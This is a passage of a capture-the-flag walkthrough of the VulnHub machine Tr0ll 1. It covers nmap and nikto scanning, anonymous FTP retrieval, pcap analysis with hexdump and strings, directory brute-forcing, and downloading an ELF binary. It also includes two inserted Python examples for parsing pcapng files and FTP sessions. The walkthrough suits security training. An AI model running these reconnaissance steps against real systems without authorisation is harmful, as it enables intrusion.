Tr0ll: 1
20 May 2019 | Walkthroughs
VulnHub URL: https://www.vulnhub.com/entry/tr0ll-1,100/
Hostname: troll
IP Address: 10.183.0.218
Information Gathering/Recon
The IP address is obtained via DHCP at boot. In my case, the IP is 10.183.0.218.
Service Enumeration/Scanning
root@kali:~/Walkthroughs/tr0ll# nmap -Pn -sT -sV -A --script=default,banner -oA tr0ll -p- 10.183.0.218
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-19 22:16 CDT
Nmap scan report for troll.homenet.dom (10.183.0.218)
Host is up (0.0038s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
|_banner: 220 (vsFTPd 3.0.2)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.183.0.222
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:39:E9:62 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 3.80 ms troll.homenet.dom (10.183.0.218)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.58 seconds
Gaining Access
Checking on the service information returned from nmap, we have the following software:
- vsFTPd 3.0.2 - no known exploits
- OpenSSH_6.6.1p1 - common username enumeration issues
- Apache/2.4.7 - a potential code execution issue when paired with PHP 7.0.2
The only software issue that might be of interest involves Apache, but it requires a specific version of PHP. Nikto might be able to tell us which version of PHP is in use.
root@kali:~/Walkthroughs/tr0ll# nikto -h http://10.183.0.218
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.183.0.218
+ Target Hostname: 10.183.0.218
+ Target Port: 80
+ Start Time: 2019-05-19 22:24:57 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2019-05-19 22:25:36 (GMT-5) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Well, we didn't get a PHP version from Nikto. We'll have to do some manual digging to see if we can tell. Before we do that, though, I'd like to check out the FTP service.
Nmap already told us quite a bit about it. It allows anonymous access. It has a single readable (and writable) pcap file named lol.pcap. Pcap files can be dangerous to just open, so we'll download it, but handle it with care.
root@kali:~/Walkthroughs/tr0ll# ftp 10.183.0.218
Connected to 10.183.0.218.
220 (vsFTPd 3.0.2)
Name (10.183.0.218:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.04 secs (208.9951 kB/s)
ftp> put test.txt test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> quit
221 Goodbye.
We were able to log in and download the pcap file. We also tried uploading a test file (just to see if we could). Permission was denied.
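One way to handle a downloaded capture such as lol.pcap with care, shown here as an added example that is not part of the original walkthrough: pull the FTP control-channel text out with a small bounds-checked parser instead of opening the file in a full protocol analyzer. It assumes a little-endian pcapng file carrying Ethernet/IPv4/TCP frames; all function names and the capture built by `build_sample()` are constructed for illustration.

```python
import struct

SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006  # pcapng block types
BOM_LE = 0x1A2B3C4D        # byte-order magic when the section is little-endian
MAX_BLOCK = 1 << 20        # refuse any single block larger than 1 MiB


def iter_blocks(data):
    """Yield (block_type, body) per pcapng block, validating every length."""
    if len(data) < 12 or struct.unpack_from("<I", data, 0)[0] != SHB:
        raise ValueError("not a pcapng file")
    if struct.unpack_from("<I", data, 8)[0] != BOM_LE:
        raise ValueError("only little-endian sections are handled")
    off = 0
    while off + 12 <= len(data):
        btype, blen = struct.unpack_from("<II", data, off)
        if blen < 12 or blen % 4 or blen > MAX_BLOCK or off + blen > len(data):
            raise ValueError(f"bad block length {blen} at offset {off}")
        # Each block repeats its length at the end; a mismatch means corruption.
        if struct.unpack_from("<I", data, off + blen - 4)[0] != blen:
            raise ValueError(f"length trailer mismatch at offset {off}")
        yield btype, data[off + 8:off + blen - 4]
        off += blen


def tcp_payload(frame):
    """Return (src_port, dst_port, payload) for Ethernet/IPv4/TCP, else None."""
    if len(frame) < 14 + 20 + 20 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ihl < 20 or ip[9] != 6:
        return None
    total = struct.unpack_from("!H", ip, 2)[0]
    if total < ihl + 20 or total > len(ip):
        return None
    tcp = ip[ihl:total]                 # total length trims Ethernet padding
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    doff = (tcp[12] >> 4) * 4
    if doff < 20 or doff > len(tcp):
        return None
    return sport, dport, tcp[doff:]


def ftp_control_lines(data, port=21):
    """Return [(direction, text)] for the FTP control channel in the capture."""
    lines = []
    for btype, body in iter_blocks(data):
        if btype != EPB or len(body) < 20:
            continue
        caplen = struct.unpack_from("<I", body, 12)[0]
        if caplen > len(body) - 20:
            raise ValueError("captured length exceeds block size")
        seg = tcp_payload(body[20:20 + caplen])
        if not seg or port not in seg[:2] or not seg[2]:
            continue
        direction = "C>S" if seg[1] == port else "S>C"
        for raw in seg[2].split(b"\r\n"):
            if raw:
                # Replace non-printable bytes so capture content cannot send
                # escape sequences to the analyst's terminal.
                text = "".join(chr(b) if 32 <= b < 127 else "." for b in raw)
                lines.append((direction, text))
    return lines


def _block(btype, body):
    body += b"\x00" * (-len(body) % 4)          # pad body to 32 bits
    total = len(body) + 12
    return struct.pack("<II", btype, total) + body + struct.pack("<I", total)


def _frame(sport, dport, payload):
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 0, 0, 0)
    tcp += payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_sample():
    """Constructed three-packet pcapng capture (not data from the target)."""
    out = _block(SHB, struct.pack("<IHHq", BOM_LE, 1, 0, -1))
    out += _block(IDB, struct.pack("<HHI", 1, 0, 0xFFFF))
    packets = [
        (50000, 21, b"USER anonymous\r\n"),
        (21, 50000, b"331 Please specify the password.\r\n"),
        (50000, 21, b"PASS \x1b[2Jx\r\n"),   # embedded terminal escape
    ]
    for sport, dport, payload in packets:
        frame = _frame(sport, dport, payload)
        head = struct.pack("<IIIII", 0, 0, 0, len(frame), len(frame))
        out += _block(EPB, head + frame)
    return out


if __name__ == "__main__":
    for direction, text in ftp_control_lines(build_sample()):
        print(direction, text)
```

To run it against a real file, pass the file's bytes (read in binary mode) to `ftp_control_lines()`; a malformed or truncated capture raises `ValueError` rather than being partially trusted.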
Using hexdump to view the file contents...
root@kali:~/Walkthroughs/tr0ll# hexdump -C lol.pcap
00001780 00 00 01 01 08 0a 00 1a c6 7b 00 05 e3 4f 32 30 |.........{...O20|
00001790 30 20 50 4f 52 54 20 63 6f 6d 6d 61 6e 64 20 73 |0 PORT command s|
000017a0 75 63 63 65 73 73 66 75 6c 2e 20 43 6f 6e 73 69 |uccessful. Consi|
000017b0 64 65 72 20 75 73 69 6e 67 20 50 41 53 56 2e 0d |der using PASV..|
000017c0 0a 00 00 00 98 00 00 00 06 00 00 00 68 00 00 00 |............h...|
000017d0 00 00 00 00 41 00 05 00 40 76 5a 8c 48 00 00 00 |....A...@vZ.H...|
000017e0 48 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |H.....) p...)]..|
000017f0 08 00 45 10 00 3a c8 27 40 00 40 06 5e 75 0a 00 |..E..:.'@.@.^u..|
00001800 00 0c 0a 00 00 06 cc e1 00 15 62 2c 08 7b 9f 75 |..........b,.{.u|
00001810 8e f9 80 18 00 1d a5 e1 00 00 01 01 08 0a 00 05 |................|
00001820 e3 4f 00 1a c6 7b 4c 49 53 54 0d 0a 68 00 00 00 |.O...{LIST..h...|
00001830 06 00 00 00 6c 00 00 00 00 00 00 00 41 00 05 00 |....l.......A...|
00001840 57 77 5a 8c 4a 00 00 00 4a 00 00 00 00 0c 29 5d |WwZ.J...J.....)]|
00001850 04 92 00 0c 29 20 70 99 08 00 45 00 00 3c 90 bd |....) p...E..<..|
00001860 40 00 40 06 95 ed 0a 00 00 06 0a 00 00 0c 00 14 |@.@.............|
00001870 ac 4a 8b d0 56 c6 00 00 00 00 a0 02 72 10 6c 55 |.J..V.......r.lU|
00001880 00 00 02 04 05 b4 04 02 08 0a 00 1a c6 7b 00 00 |.............{..|
00001890 00 00 01 03 03 05 00 00 6c 00 00 00 06 00 00 00 |........l.......|
000018a0 6c 00 00 00 00 00 00 00 41 00 05 00 64 77 5a 8c |l.......A...dwZ.|
000018b0 4a 00 00 00 4a 00 00 00 00 0c 29 20 70 99 00 0c |J...J.....) p...|
000018c0 29 5d 04 92 08 00 45 00 00 3c 00 00 40 00 40 06 |)]....E..<..@.@.|
000018d0 26 ab 0a 00 00 0c 0a 00 00 06 ac 4a 00 14 83 36 |&..........J...6|
000018e0 10 1f 8b d0 56 c7 a0 12 71 20 f6 84 00 00 02 04 |....V...q ......|
000018f0 05 b4 04 02 08 0a 00 05 e3 4f 00 1a c6 7b 01 03 |.........O...{..|
00001900 03 0a 00 00 6c 00 00 00 06 00 00 00 64 00 00 00 |....l.......d...|
00001910 00 00 00 00 41 00 05 00 da 77 5a 8c 42 00 00 00 |....A....wZ.B...|
00001920 42 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |B.....)]....) p.|
00001930 08 00 45 00 00 34 90 be 40 00 40 06 95 f4 0a 00 |..E..4..@.@.....|
00001940 00 06 0a 00 00 0c 00 14 ac 4a 8b d0 56 c7 83 36 |.........J..V..6|
00001950 10 20 80 10 03 91 92 e3 00 00 01 01 08 0a 00 1a |. ..............|
00001960 c6 7b 00 05 e3 4f 00 00 64 00 00 00 06 00 00 00 |.{...O..d.......|
00001970 8c 00 00 00 00 00 00 00 41 00 05 00 c3 78 5a 8c |........A....xZ.|
00001980 69 00 00 00 69 00 00 00 00 0c 29 5d 04 92 00 0c |i...i.....)]....|
00001990 29 20 70 99 08 00 45 00 00 5b 3e 0e 40 00 40 06 |) p...E..[>.@.@.|
000019a0 e8 7d 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |.}.............u|
000019b0 8e f9 62 2c 08 81 80 18 03 89 39 d8 00 00 01 01 |..b,......9.....|
000019c0 08 0a 00 1a c6 7b 00 05 e3 4f 31 35 30 20 48 65 |.....{...O150 He|
000019d0 72 65 20 63 6f 6d 65 73 20 74 68 65 20 64 69 72 |re comes the dir|
000019e0 65 63 74 6f 72 79 20 6c 69 73 74 69 6e 67 2e 0d |ectory listing..|
000019f0 0a 00 00 00 8c 00 00 00 06 00 00 00 ac 00 00 00 |................|
00001a00 00 00 00 00 41 00 05 00 c7 78 5a 8c 8c 00 00 00 |....A....xZ.....|
00001a10 8c 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |......)]....) p.|
00001a20 08 00 45 08 00 7e 90 bf 40 00 40 06 95 a1 0a 00 |..E..~..@.@.....|
00001a30 00 06 0a 00 00 0c 00 14 ac 4a 8b d0 56 c7 83 36 |.........J..V..6|
00001a40 10 20 80 18 03 91 36 df 00 00 01 01 08 0a 00 1a |. ....6.........|
00001a50 c6 7b 00 05 e3 4f 2d 72 77 2d 72 2d 2d 72 2d 2d |.{...O-rw-r--r--|
00001a60 20 20 20 20 31 20 30 20 20 20 20 20 20 20 20 30 | 1 0 0|
00001a70 20 20 20 20 20 20 20 20 20 20 20 20 20 31 34 37 | 147|
00001a80 20 41 75 67 20 31 30 20 30 30 3a 33 38 20 73 65 | Aug 10 00:38 se|
00001a90 63 72 65 74 5f 73 74 75 66 66 2e 74 78 74 0d 0a |cret_stuff.txt..|
00001aa0 ac 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |........d.......|
00001ab0 41 00 05 00 cb 78 5a 8c 42 00 00 00 42 00 00 00 |A....xZ.B...B...|
00001ac0 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 00 |..) p...)]....E.|
00001ad0 00 34 f3 6f 40 00 40 06 33 43 0a 00 00 0c 0a 00 |.4.o@.@.3C......|
00001ae0 00 06 ac 4a 00 14 83 36 10 20 8b d0 57 11 80 10 |...J...6. ..W...|
00001af0 00 1d 96 0d 00 00 01 01 08 0a 00 05 e3 4f 00 1a |.............O..|
00001b00 c6 7b 00 00 64 00 00 00 06 00 00 00 64 00 00 00 |.{..d.......d...|
00001b10 00 00 00 00 41 00 05 00 dc 78 5a 8c 42 00 00 00 |....A....xZ.B...|
00001b20 42 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |B.....)]....) p.|
00001b30 08 00 45 08 00 34 90 c0 40 00 40 06 95 ea 0a 00 |..E..4..@.@.....|
00001b40 00 06 0a 00 00 0c 00 14 ac 4a 8b d0 57 11 83 36 |.........J..W..6|
00001b50 10 20 80 11 03 91 92 98 00 00 01 01 08 0a 00 1a |. ..............|
00001b60 c6 7b 00 05 e3 4f 00 00 64 00 00 00 06 00 00 00 |.{...O..d.......|
00001b70 64 00 00 00 00 00 00 00 41 00 05 00 54 79 5a 8c |d.......A...TyZ.|
00001b80 42 00 00 00 42 00 00 00 00 0c 29 20 70 99 00 0c |B...B.....) p...|
00001b90 29 5d 04 92 08 00 45 08 00 34 f3 70 40 00 40 06 |)]....E..4.p@.@.|
00001ba0 33 3a 0a 00 00 0c 0a 00 00 06 ac 4a 00 14 83 36 |3:.........J...6|
00001bb0 10 20 8b d0 57 12 80 11 00 1d 96 0b 00 00 01 01 |. ..W...........|
00001bc0 08 0a 00 05 e3 4f 00 1a c6 7b 00 00 64 00 00 00 |.....O...{..d...|
00001bd0 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00001be0 8c 80 5a 8c 42 00 00 00 42 00 00 00 00 0c 29 5d |..Z.B...B.....)]|
00001bf0 04 92 00 0c 29 20 70 99 08 00 45 08 00 34 90 c1 |....) p...E..4..|
00001c00 40 00 40 06 95 e9 0a 00 00 06 0a 00 00 0c 00 14 |@.@.............|
00001c10 ac 4a 8b d0 57 12 83 36 10 21 80 10 03 91 92 97 |.J..W..6.!......|
00001c20 00 00 01 01 08 0a 00 1a c6 7b 00 05 e3 4f 00 00 |.........{...O..|
00001c30 64 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 |d.......|.......|
00001c40 41 00 05 00 93 80 5a 8c 5a 00 00 00 5a 00 00 00 |A.....Z.Z...Z...|
00001c50 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
00001c60 00 4c 3e 0f 40 00 40 06 e8 8b 0a 00 00 06 0a 00 |.L>.@.@.........|
00001c70 00 0c 00 15 cc e1 9f 75 8f 20 62 2c 08 81 80 18 |.......u. b,....|
00001c80 03 89 89 64 00 00 01 01 08 0a 00 1a c6 7b 00 05 |...d.........{..|
00001c90 e3 4f 32 32 36 20 44 69 72 65 63 74 6f 72 79 20 |.O226 Directory |
00001ca0 73 65 6e 64 20 4f 4b 2e 0d 0a 00 00 7c 00 00 00 |send OK.....|...|
00001cb0 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00001cc0 b8 80 5a 8c 42 00 00 00 42 00 00 00 00 0c 29 20 |..Z.B...B.....) |
00001cd0 70 99 00 0c 29 5d 04 92 08 00 45 10 00 34 c8 28 |p...)]....E..4.(|
00001ce0 40 00 40 06 5e 7a 0a 00 00 0c 0a 00 00 06 cc e1 |@.@.^z..........|
00001cf0 00 15 62 2c 08 81 9f 75 8f 38 80 10 00 1d 52 51 |..b,...u.8....RQ|
00001d00 00 00 01 01 08 0a 00 05 e3 50 00 1a c6 7b 00 00 |.........P...{..|
00001d10 64 00 00 00 06 00 00 00 68 00 00 00 00 00 00 00 |d.......h.......|
00001d20 41 00 05 00 7e ca 89 8d 48 00 00 00 48 00 00 00 |A...~...H...H...|
00001d30 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
00001d40 00 3a c8 29 40 00 40 06 5e 73 0a 00 00 0c 0a 00 |.:.)@.@.^s......|
00001d50 00 06 cc e1 00 15 62 2c 08 81 9f 75 8f 38 80 18 |......b,...u.8..|
00001d60 00 1d 97 26 00 00 01 01 08 0a 00 05 f6 b9 00 1a |...&............|
00001d70 c6 7b 51 55 49 54 0d 0a 68 00 00 00 06 00 00 00 |.{QUIT..h.......|
00001d80 70 00 00 00 00 00 00 00 41 00 05 00 ce cb 89 8d |p.......A.......|
00001d90 50 00 00 00 50 00 00 00 00 0c 29 5d 04 92 00 0c |P...P.....)]....|
00001da0 29 20 70 99 08 00 45 00 00 42 3e 10 40 00 40 06 |) p...E..B>.@.@.|
00001db0 e8 94 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00001dc0 8f 38 62 2c 08 87 80 18 03 89 39 1e 00 00 01 01 |.8b,......9.....|
00001dd0 08 0a 00 1a d9 e5 00 05 f6 b9 32 32 31 20 47 6f |..........221 Go|
00001de0 6f 64 62 79 65 2e 0d 0a 70 00 00 00 06 00 00 00 |odbye...p.......|
00001df0 64 00 00 00 00 00 00 00 41 00 05 00 d5 cb 89 8d |d.......A.......|
00001e00 42 00 00 00 42 00 00 00 00 0c 29 5d 04 92 00 0c |B...B.....)]....|
00001e10 29 20 70 99 08 00 45 00 00 34 3e 11 40 00 40 06 |) p...E..4>.@.@.|
00001e20 e8 a1 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00001e30 8f 46 62 2c 08 87 80 11 03 89 27 fd 00 00 01 01 |.Fb,......'.....|
00001e40 08 0a 00 1a d9 e5 00 05 f6 b9 00 00 64 00 00 00 |............d...|
00001e50 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00001e60 66 cc 89 8d 42 00 00 00 42 00 00 00 00 0c 29 20 |f...B...B.....) |
00001e70 70 99 00 0c 29 5d 04 92 08 00 45 10 00 34 c8 2a |p...)]....E..4.*|
00001e80 40 00 40 06 5e 78 0a 00 00 0c 0a 00 00 06 cc e1 |@.@.^x..........|
00001e90 00 15 62 2c 08 87 9f 75 8f 47 80 11 00 1d 2b 68 |..b,...u.G....+h|
00001ea0 00 00 01 01 08 0a 00 05 f6 b9 00 1a d9 e5 00 00 |................|
00001eb0 64 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |d.......d.......|
00001ec0 41 00 05 00 ff cc 89 8d 42 00 00 00 42 00 00 00 |A.......B...B...|
00001ed0 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
00001ee0 00 34 3e 12 40 00 40 06 e8 a0 0a 00 00 06 0a 00 |.4>.@.@.........|
00001ef0 00 0c 00 15 cc e1 9f 75 8f 47 62 2c 08 88 80 10 |.......u.Gb,....|
00001f00 03 89 27 fc 00 00 01 01 08 0a 00 1a d9 e5 00 05 |..'.............|
00001f10 f6 b9 00 00 64 00 00 00 05 00 00 00 6c 00 00 00 |....d.......l...|
00001f20 00 00 00 00 41 00 05 00 d6 ad cf 8d 01 00 1c 00 |....A...........|
00001f30 43 6f 75 6e 74 65 72 73 20 70 72 6f 76 69 64 65 |Counters provide|
00001f40 64 20 62 79 20 64 75 6d 70 63 61 70 02 00 08 00 |d by dumpcap....|
00001f50 41 00 05 00 4d 98 ed 8a 03 00 08 00 41 00 05 00 |A...M.......A...|
00001f60 09 ad cf 8d 04 00 08 00 43 00 00 00 00 00 00 00 |........C.......|
00001f70 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00001f80 6c 00 00 00 |l...|
00001f84
...we see it is a capture of an FTP session. It seems to be a transfer of a file named "secret_stuff.txt". However, we see a not-so-friendly message in the file as well.
root@kali:~/Walkthroughs/tr0ll# strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap
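The control channel above is cleartext, so the login, the file names and each data-channel endpoint can be recovered from it. The following is an added example, not part of the original walkthrough: it parses those control lines, tolerating the stray leading characters that strings leaves behind, and decodes each PORT argument (RFC 959: port = p1 * 256 + p2) into a Wireshark display filter for the matching data connection. The function and class names are assumptions made for this example.

```python
import re
from dataclasses import dataclass, field

# Control lines copied from the `strings lol.pcap` output above (file contents
# and the second directory-listing line omitted). Some lines carry one stray
# leading character (W, O, {, ") left over from header bytes in the capture.
SAMPLE = '''\
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O226 Directory send OK.
{QUIT
221 Goodbye.
'''

JUNK = r'^.{0,2}?'  # allow up to two stray characters before the real text
CMD_RE = re.compile(JUNK + r'(USER|PASS|SYST|TYPE|PORT|LIST|RETR|STOR|QUIT)(?: (.*))?$')
REPLY_RE = re.compile(JUNK + r'([1-5]\d\d) (.*)$')
PORT_ARG_RE = re.compile(r'\d{1,3}(,\d{1,3}){5}', re.ASCII)


@dataclass
class Session:
    user: str = None
    password: str = None
    transfers: list = field(default_factory=list)  # (verb, path, ip, port)
    unparsed: list = field(default_factory=list)   # neither command nor reply


def parse_port_arg(arg):
    """Decode 'h1,h2,h3,h4,p1,p2' into (ip, port); return None if malformed."""
    if not PORT_ARG_RE.fullmatch(arg):
        return None
    nums = [int(p) for p in arg.split(',')]
    if any(n > 255 for n in nums):
        return None
    return '.'.join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def parse_session(text):
    """Walk the control lines and pair each transfer with its PORT endpoint."""
    session = Session()
    pending = None  # endpoint announced by the most recent PORT command
    for line in text.splitlines():
        m = CMD_RE.match(line)
        if m:
            verb, arg = m.group(1), m.group(2) or ''
            if verb == 'USER':
                session.user = arg
            elif verb == 'PASS':
                session.password = arg
            elif verb == 'PORT':
                pending = parse_port_arg(arg)
            elif verb in ('LIST', 'RETR', 'STOR'):
                ip, port = pending or (None, None)
                session.transfers.append((verb, arg, ip, port))
                pending = None  # an active-mode endpoint is used once
        elif not REPLY_RE.match(line):
            session.unparsed.append(line)
    return session


def display_filters(session, verb='RETR'):
    """Wireshark display filters isolating the data connection of each `verb`."""
    return [f'ip.addr == {ip} && tcp.port == {port}'
            for v, _, ip, port in session.transfers if v == verb and port]


if __name__ == '__main__':
    s = parse_session(SAMPLE)
    print('login:', s.user, '/', s.password)
    for t in s.transfers:
        print('transfer:', t)
    print('filters:', display_filters(s))
```
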
Time to get back to digging into the HTTP service on TCP port 80. The default page for the service only returns a "hacker" image. The /secret/ page returns a "troll" image. Downloading and checking each with exiftool produces nothing. Running dirb with the big dictionary also doesn't give us anything useful:
root@kali:~/Walkthroughs/tr0ll# dirb http://10.183.0.218 /usr/share/dirb/wordlists/big.txt -o dirb-http-10.183.0.218.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb-http-10.183.0.218.txt
START_TIME: Sun May 19 22:53:38 2019
URL_BASE: http://10.183.0.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.183.0.218/ ----
+ http://10.183.0.218/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://10.183.0.218/secret/
+ http://10.183.0.218/server-status (CODE:403|SIZE:292)
---- Entering directory: http://10.183.0.218/secret/ ----
-----------------
END_TIME: Sun May 19 22:55:37 2019
DOWNLOADED: 40916 - FOUND: 2
Reconsidering the "taunt" message in the pcap file, they did mention a "super secret directory" (sup3rs3cr3tdirlol). Let's see if that exists...
root@kali:~/Walkthroughs/tr0ll# curl http://10.183.0.218/sup3rs3cr3tdirlol/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /sup3rs3cr3tdirlol</title>
</head>
<body>
<h1>Index of /sup3rs3cr3tdirlol</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="roflmao">roflmao</a></td><td align="right">2014-08-11 18:45 </td><td align="right">7.1K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.7 (Ubuntu) Server at 10.183.0.218 Port 80</address>
</body></html>
Looks like we have a directory listing with a single file, roflmao...
I'll download the file to see what it is.
root@kali:~/Walkthroughs/tr0ll# wget http://10.183.0.218/sup3rs3cr3tdirlol/roflmao
--2019-05-19 23:40:48-- http://10.183.0.218/sup3rs3cr3tdirlol/roflmao
Connecting to 10.183.0.218:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7296 (7.1K)
Saving to: 'roflmao'
roflmao 100%[=======================================================================>] 7.12K --.-KB/s in 0s
2019-05-19 23:40:48 (428 MB/s) - 'roflmao' saved [7296/7296]
root@kali:~/Walkthroughs/tr0ll# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
